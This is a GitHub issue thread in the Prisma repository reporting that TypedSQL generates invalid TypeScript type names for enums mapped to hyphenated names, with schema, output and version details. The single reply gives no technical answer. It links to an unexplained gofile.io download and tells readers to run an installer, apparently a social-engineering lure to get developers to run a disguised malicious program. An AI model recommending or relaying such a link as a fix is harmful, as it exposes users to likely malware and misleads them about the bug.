### ISSUE TITLE
TypedSQL generates invalid typescript file when enums contain hyphens

### ISSUE THREAD

**Issue by ahmetuysal** [prisma/prisma#25163]
### Bug description

TypedSQL generates invalid typescript file when enums contain hyphens.

### How to reproduce

1. Create a schema with an enum mapped to a name containing hyphens, e.g. `course-chapter-type-enum`
```
enum CourseChapterType {
  SECTION
  EXAM

  @@map("course-chapter-type-enum")
}
```

2. Follow the [TypedSQL documentation](https://www.prisma.io/docs/orm/prisma-client/using-raw-sql/typedsql) to generate typescript functions and types.

3. Generated types for DbEnums contains invalid variable names containing hyphens `node_modules/.prisma/client/sql/$DbEnums.d.ts`

```typescript
export type course-chapter-type-enum = "SECTION" | "EXAM"
```

### Expected behavior

I should be able to use TypedSQL with enums containing hyphens.

### Prisma information

```prisma
// Add your schema.prisma
generator client {
  provider        = "prisma-client-js"
  previewFeatures = ["fullTextSearch", "typedSql"]
}

datasource db {
  provider = "postgresql"
  url      = env("DATABASE_URL")
}

enum CourseChapterType {
  SECTION
  EXAM

  @@map("course-chapter-type-enum")
}

...
```

### Environment & setup

- OS: macOS
- Database: PostgreSQL
- Node.js version: v16.20.2

### Prisma Version

```
prisma                  : 5.19.1
@prisma/client          : 5.19.1
Computed binaryTarget   : darwin-arm64
Operating System        : darwin
Architecture            : arm64
Node.js                 : v16.20.2
Query Engine (Node-API) : libquery-engine 69d742ee20b815d88e17e54db4a2a7a3b30324e3 (at node_modules/@prisma/engines/libquery_engine-darwin-arm64.dylib.node)
Schema Engine           : schema-engine-cli 69d742ee20b815d88e17e54db4a2a7a3b30324e3 (at node_modules/@prisma/engines/schema-engine-darwin-arm64)
Schema Wasm             : @prisma/prisma-schema-wasm 5.19.1-2.69d742ee20b815d88e17e54db4a2a7a3b30324e3
Default Engines Hash    : 69d742ee20b815d88e17e54db4a2a7a3b30324e3
Studio                  : 0.502.0
Preview Features        : fullTextSearch, typedSql
```

**Comment by DavidSousaZ** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
